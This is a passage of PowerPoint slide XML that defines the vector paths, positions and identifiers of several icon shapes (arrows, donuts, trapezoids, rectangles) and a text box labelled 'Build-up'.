                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="482072" y="767202"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="361326" y="768003"/>
                    <a:pt x="274023" y="799606"/>
                    <a:pt x="234579" y="865253"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163579" y="983417"/>
                    <a:pt x="262764" y="1186709"/>
                    <a:pt x="475981" y="1409774"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="494126" y="1427453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="571333" y="1360517"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="607672" y="1330436"/>
                    <a:pt x="645452" y="1300540"/>
                    <a:pt x="684587" y="1270938"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="776848" y="1204197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="808495" y="949742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835139" y="827220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732420" y="798327"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="639007" y="777329"/>
                    <a:pt x="554520" y="766721"/>
                    <a:pt x="482072" y="767202"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1382560" y="215755"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1244707" y="215755"/>
                    <a:pt x="1121535" y="405476"/>
                    <a:pt x="1040146" y="703126"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1038397" y="710184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1159394" y="751212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1388689" y="852872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1619722" y="755229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1729016" y="720284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1724974" y="703126"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1643585" y="405476"/>
                    <a:pt x="1520414" y="215755"/>
                    <a:pt x="1382560" y="215755"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1382561" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1576111" y="0"/>
                    <a:pt x="1749046" y="220285"/>
                    <a:pt x="1863319" y="565886"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1892754" y="669221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1998805" y="644109"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2355240" y="570272"/>
                    <a:pt x="2632481" y="609896"/>
                    <a:pt x="2729256" y="777515"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2826030" y="945133"/>
                    <a:pt x="2721726" y="1205043"/>
                    <a:pt x="2479563" y="1476806"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2396868" y="1564493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2415853" y="1583149"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2697403" y="1884053"/>
                    <a:pt x="2823474" y="2176199"/>
                    <a:pt x="2715481" y="2355928"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2615796" y="2521833"/>
                    <a:pt x="2337906" y="2556612"/>
                    <a:pt x="1982813" y="2476565"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1890625" y="2453030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1863319" y="2544172"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1749047" y="2889773"/>
                    <a:pt x="1576111" y="3110058"/>
                    <a:pt x="1382561" y="3110058"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1189012" y="3110058"/>
                    <a:pt x="1016076" y="2889773"/>
                    <a:pt x="901803" y="2544172"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="872368" y="2440837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="766317" y="2465949"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="409882" y="2539787"/>
                    <a:pt x="132641" y="2500163"/>
                    <a:pt x="35866" y="2332544"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-60908" y="2164925"/>
                    <a:pt x="43396" y="1905015"/>
                    <a:pt x="285559" y="1633252"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="368254" y="1545565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349269" y="1526910"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="67719" y="1226005"/>
                    <a:pt x="-58351" y="933860"/>
                    <a:pt x="49641" y="754130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="149326" y="588226"/>
                    <a:pt x="427216" y="553446"/>
                    <a:pt x="782309" y="633493"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="874497" y="657029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="901803" y="565886"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1016076" y="220285"/>
                    <a:pt x="1189012" y="0"/>
                    <a:pt x="13825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9C9A370C-239C-46DD-B40B-9E055DB25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6004" y="3682990"/>
              <a:ext cx="320490" cy="269438"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3985089" h="3350285">
                  <a:moveTo>
                    <a:pt x="1489879" y="1687056"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1413602" y="1687056"/>
                    <a:pt x="1351768" y="1748890"/>
                    <a:pt x="1351768" y="1825167"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1351768" y="1828965"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1351768" y="1905242"/>
                    <a:pt x="1413602" y="1967076"/>
                    <a:pt x="1489879" y="1967076"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1717713" y="1967076"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1793990" y="1967076"/>
                    <a:pt x="1855824" y="1905242"/>
                    <a:pt x="1855824" y="1828965"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1855824" y="1825167"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1855824" y="1748890"/>
                    <a:pt x="1793990" y="1687056"/>
                    <a:pt x="1717713" y="1687056"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2281462" y="1675141"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2205185" y="1675141"/>
                    <a:pt x="2143351" y="1736975"/>
                    <a:pt x="2143351" y="1813252"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2143351" y="1817050"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2143351" y="1893327"/>
                    <a:pt x="2205185" y="1955161"/>
                    <a:pt x="2281462" y="1955161"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2509296" y="1955161"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2585573" y="1955161"/>
                    <a:pt x="2647407" y="1893327"/>
                    <a:pt x="2647407" y="1817050"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2647407" y="1813252"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2647407" y="1736975"/>
                    <a:pt x="2585573" y="1675141"/>
                    <a:pt x="2509296" y="1675141"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2837535" y="1159396"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2731595" y="1159396"/>
                    <a:pt x="2645713" y="1245278"/>
                    <a:pt x="2645713" y="1351218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2645713" y="1457158"/>
                    <a:pt x="2731595" y="1543040"/>
                    <a:pt x="2837535" y="1543040"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2943475" y="1543040"/>
                    <a:pt x="3029357" y="1457158"/>
                    <a:pt x="3029357" y="1351218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3029357" y="1245278"/>
                    <a:pt x="2943475" y="1159396"/>
                    <a:pt x="2837535" y="1159396"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3235655" y="750352"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3129715" y="750352"/>
                    <a:pt x="3043833" y="836234"/>
                    <a:pt x="3043833" y="942174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3043833" y="1048114"/>
                    <a:pt x="3129715" y="1133996"/>
                    <a:pt x="3235655" y="1133996"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3341595" y="1133996"/>
                    <a:pt x="3427477" y="1048114"/>
                    <a:pt x="3427477" y="942174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3427477" y="836234"/>
                    <a:pt x="3341595" y="750352"/>
                    <a:pt x="3235655" y="750352"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2455585" y="750352"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2349645" y="750352"/>
                    <a:pt x="2263763" y="836234"/>
                    <a:pt x="2263763" y="942174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2263763" y="1048114"/>
                    <a:pt x="2349645" y="1133996"/>
                    <a:pt x="2455585" y="1133996"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2561525" y="1133996"/>
                    <a:pt x="2647407" y="1048114"/>
                    <a:pt x="2647407" y="942174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2647407" y="836234"/>
                    <a:pt x="2561525" y="750352"/>
                    <a:pt x="2455585" y="750352"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="941776" y="640989"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1181794" y="640989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181794" y="881020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421825" y="881020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421825" y="1121038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181794" y="1121038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181794" y="1361069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="941776" y="1361069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="941776" y="1121038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701745" y="1121038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701745" y="881020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="941776" y="881020"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1061785" y="459017"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="762440" y="459017"/>
                    <a:pt x="519773" y="701684"/>
                    <a:pt x="519773" y="1001029"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="519773" y="1300374"/>
                    <a:pt x="762440" y="1543041"/>
                    <a:pt x="1061785" y="1543041"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1361130" y="1543041"/>
                    <a:pt x="1603797" y="1300374"/>
                    <a:pt x="1603797" y="1001029"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1603797" y="701684"/>
                    <a:pt x="1361130" y="459017"/>
                    <a:pt x="1061785" y="459017"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2837535" y="359296"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2731595" y="359296"/>
                    <a:pt x="2645713" y="445178"/>
                    <a:pt x="2645713" y="551118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2645713" y="657058"/>
                    <a:pt x="2731595" y="742940"/>
                    <a:pt x="2837535" y="742940"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2943475" y="742940"/>
                    <a:pt x="3029357" y="657058"/>
                    <a:pt x="3029357" y="551118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3029357" y="445178"/>
                    <a:pt x="2943475" y="359296"/>
                    <a:pt x="2837535" y="359296"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="927799" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2978398" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3447374" y="0"/>
                    <a:pt x="3902811" y="418280"/>
                    <a:pt x="3926614" y="887256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4011721" y="1784310"/>
                    <a:pt x="4065643" y="3326870"/>
                    <a:pt x="3630620" y="3349891"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3101375" y="3362701"/>
                    <a:pt x="2778421" y="2566209"/>
                    <a:pt x="2352321" y="2174369"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1572952" y="2174369"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1161652" y="2566210"/>
                    <a:pt x="901104" y="3370635"/>
                    <a:pt x="339051" y="3349892"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-171518" y="3349299"/>
                    <a:pt x="45251" y="1463012"/>
                    <a:pt x="48163" y="849156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48163" y="380180"/>
                    <a:pt x="458823" y="0"/>
                    <a:pt x="927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">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D87D4543-E180-4DF6-A62E-340B16086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95" y="3961380"/>
              <a:ext cx="348693" cy="269437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5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42E01154-688D-4F5A-ACE4-7E1F6AF2E45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6822" y="3332187"/>
              <a:ext cx="299221" cy="322665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9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{083C078B-CB36-4448-B100-8BECDC326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6432" y="2099615"/>
              <a:ext cx="296548" cy="296548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8508A6-2707-40ED-98D7-03C1932691B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08791" y="4297323"/>
              <a:ext cx="336694" cy="323742"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3948393" h="3817544">
                  <a:moveTo>
                    <a:pt x="1888045" y="2370407"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1180379" y="2998560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695350" y="2712314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703301" y="3014463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1888044" y="3817544"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1885393" y="3356368"/>
                    <a:pt x="1874793" y="2911096"/>
                    <a:pt x="1888045" y="2370407"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2059390" y="2370407"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2072642" y="2911096"/>
                    <a:pt x="2062042" y="3356368"/>
                    <a:pt x="2059391" y="3817544"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3244134" y="3014463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3252085" y="2712314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2767056" y="2998560"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="733907" y="1451867"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="2113471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1170450" y="2848461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1919327" y="2170968"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3206900" y="1451867"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2021479" y="2170968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2770356" y="2848461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3940806" y="2113471"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1195981" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10560" y="719101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759438" y="1396594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1929887" y="661605"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2762973" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2029067" y="661605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3199516" y="1396594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948393" y="719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9ED16-E476-4E17-A34C-B1B46D12815D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8705632" y="4148811"/>
            <a:ext cx="164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Build-up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275C19-BA54-4650-B131-3F27D4E65004}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8045579" y="2409380"/>
            <a:ext cx="2811142" cy="2844985"/>
            <a:chOff x="8045579" y="2409380"/>
            <a:chExt cx="2811142" cy="2844985"/>
          </a:xfrm>
        </p:grpSpPr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D5FFF734-6862-424E-A388-EF245D0D57E5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10509374" y="3444941"/>
              <a:ext cx="343339" cy="343339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39952090-A2AE-4DA8-A3DA-62986F260D10}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8174482" y="417483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C9A03E33-5D13-4BFE-9600-571F01E84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5535" y="2409380"/>
              <a:ext cx="393582" cy="392828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Trapezoid 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DD1CF70-6406-4C32-BF96-0C20604B317A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10073915" y="2714730"/>
              <a:ext cx="351357" cy="423598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Rectangle 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5905C8AA-7159-4608-899A-6C22426D61BE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="3600000">
              <a:off x="8507130" y="4424299"/>
              <a:ext cx="162074" cy="478539"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1327763" h="3920353">
                  <a:moveTo>
                    <a:pt x="483881" y="2840232"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="843881" y="2840232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="843881" y="3920353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483881" y="3920353"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="757697" y="168239"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="757697" y="384263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930062" y="384263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930062" y="168239"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="432932" y="168239"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="432932" y="384263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="605297" y="384263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="605297" y="168239"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="168643" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1159119" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1159119" y="539093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1327763" y="539093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1327763" y="2245406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1318300" y="2245406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1127664" y="2719000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200100" y="2719000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9464" y="2245406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2245406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="539093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168643" y="539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3" name="Rectangle 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61DFCD4A-250D-4565-B9BF-3EB2727DF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579" y="3848133"/>
              <a:ext cx="330939" cy="260933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Donut 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{077F0151-42C6-4168-9205-DCA71719D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511" y="4923426"/>
              <a:ext cx="304410" cy="330939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225AE540-4E33-4C43-BCFF-ACE56AD8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8127" y="4821478"/>
              <a:ext cx="257012" cy="330939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Rounded Rectangle 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B08C69BE-22CC-4031-8AD6-A8B0C2C8A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7386" y="3842640"/>
              <a:ext cx="309335" cy="30930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117745" y="2289258"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2253931" y="2373161"/>
                    <a:pt x="2290104" y="2397532"/>
                    <a:pt x="2392952" y="2510010"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2551302" y="2699530"/>
                    <a:pt x="2456894" y="2911213"/>
                    <a:pt x="2285214" y="2987744"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2046443" y="3084914"/>
                    <a:pt x="1864058" y="3073352"/>
                    <a:pt x="1634211" y="2962065"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1390134" y="2803501"/>
                    <a:pt x="1391670" y="2463226"/>
                    <a:pt x="1703848" y="2355742"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1867216" y="2309770"/>
                    <a:pt x="1932946" y="2304275"/>
                    <a:pt x="2117745" y="2289258"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1895201" y="880902"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2049819" y="878570"/>
                    <a:pt x="2210983" y="1023567"/>
                    <a:pt x="2276065" y="1236504"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2350446" y="1479859"/>
                    <a:pt x="2271166" y="1719799"/>
                    <a:pt x="2098990" y="1772423"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1926813" y="1825048"/>
                    <a:pt x="1726940" y="1670429"/>
                    <a:pt x="1652559" y="1427074"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1578180" y="1183717"/>
                    <a:pt x="1657458" y="943778"/>
                    <a:pt x="1829635" y="891153"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2577034" y="759541"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1972441" y="767241"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1929619" y="768623"/>
                    <a:pt x="1886068" y="773785"/>
                    <a:pt x="1842289" y="783004"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1492048" y="856758"/>
                    <a:pt x="1259862" y="1162246"/>
                    <a:pt x="1323686" y="1465331"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1380617" y="1735681"/>
                    <a:pt x="1653838" y="1912801"/>
                    <a:pt x="1960688" y="1894227"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1954787" y="1896039"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1858317" y="2000800"/>
                    <a:pt x="1978682" y="2148499"/>
                    <a:pt x="2028445" y="2210716"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1914361" y="2213518"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1373805" y="2249742"/>
                    <a:pt x="1143478" y="2466102"/>
                    <a:pt x="1177422" y="2809298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1211366" y="3152493"/>
                    <a:pt x="1741992" y="3244646"/>
                    <a:pt x="2060873" y="3229704"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2379755" y="3214763"/>
                    <a:pt x="2698110" y="2930571"/>
                    <a:pt x="2719230" y="2648210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2699867" y="2070575"/>
                    <a:pt x="2052418" y="2112562"/>
                    <a:pt x="2282832" y="1799863"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2510843" y="1673695"/>
                    <a:pt x="2641919" y="1435236"/>
                    <a:pt x="2592014" y="1198247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2566015" y="1074781"/>
                    <a:pt x="2494906" y="970760"/>
                    <a:pt x="2395028" y="897200"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2564389" y="891152"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2644558" y="859402"/>
                    <a:pt x="2739013" y="796695"/>
                    <a:pt x="2769176" y="767327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2755484" y="761968"/>
                    <a:pt x="2680847" y="759625"/>
                    <a:pt x="2577034" y="759541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Down Arrow 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1349248-BC3E-4DCD-9051-D2CF537FC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733" y="3025716"/>
              <a:ext cx="257188" cy="377708"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2745756" h="4032448">
                  <a:moveTo>
                    <a:pt x="1622229" y="1008112"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2371247" y="1008112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2371247" y="3081405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2745756" y="3081405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1996738" y="4032448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1247720" y="3081405"/>
                  </a:lnTo>
